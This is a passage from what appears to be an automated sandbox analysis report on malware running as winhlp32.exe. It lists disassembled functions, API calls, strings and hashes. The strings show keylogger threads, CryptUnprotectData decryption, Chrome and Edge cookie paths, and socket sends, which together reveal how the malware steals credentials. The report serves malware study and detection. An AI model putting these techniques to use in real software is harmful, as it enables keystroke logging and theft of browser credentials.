                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    • Opcode ID: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                    • Opcode Fuzzy Hash: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                    • __freea.LIBCMT ref: 0045121D
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID:
                                    • API String ID: 313313983-0
                                    • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                    • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                    • _free.LIBCMT ref: 0044F3BF
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                    • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                    • _free.LIBCMT ref: 004482D3
                                    • _free.LIBCMT ref: 004482FA
                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                    • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004509D4
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 004509E6
                                    • _free.LIBCMT ref: 004509F8
                                    • _free.LIBCMT ref: 00450A0A
                                    • _free.LIBCMT ref: 00450A1C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00444066
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00444078
                                    • _free.LIBCMT ref: 0044408B
                                    • _free.LIBCMT ref: 0044409C
                                    • _free.LIBCMT ref: 004440AD
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strpbrk.LIBCMT ref: 0044E738
                                    • _free.LIBCMT ref: 0044E855
                                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                    • String ID: XQG$NG$PG
                                    • API String ID: 1634807452-3565412412
                                    • Opcode ID: 5c4ece90d719a46e37378e4ca15dbea4c442335f4379e4c96aea1604833b42c8
                                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                    • Opcode Fuzzy Hash: 5c4ece90d719a46e37378e4ca15dbea4c442335f4379e4c96aea1604833b42c8
                                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: `#D$`#D
                                    • API String ID: 885266447-2450397995
                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 00443475
                                    • _free.LIBCMT ref: 00443540
                                    • _free.LIBCMT ref: 0044354A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\winhlp32.exe
                                    • API String ID: 2506810119-3669941681
                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    • Opcode ID: 1c9c4ba399293831d0fb5f486923e09a60e5b94a628d9fb6433429bc7bd7f276
                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                    • Opcode Fuzzy Hash: 1c9c4ba399293831d0fb5f486923e09a60e5b94a628d9fb6433429bc7bd7f276
                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 004162F5
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.KERNELBASE(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                    • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                    • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                    • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    • Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                    • Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$wsprintf
                                    • String ID: Online Keylogger Started
                                    • API String ID: 112202259-1258561607
                                    • Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                    • Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                    • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
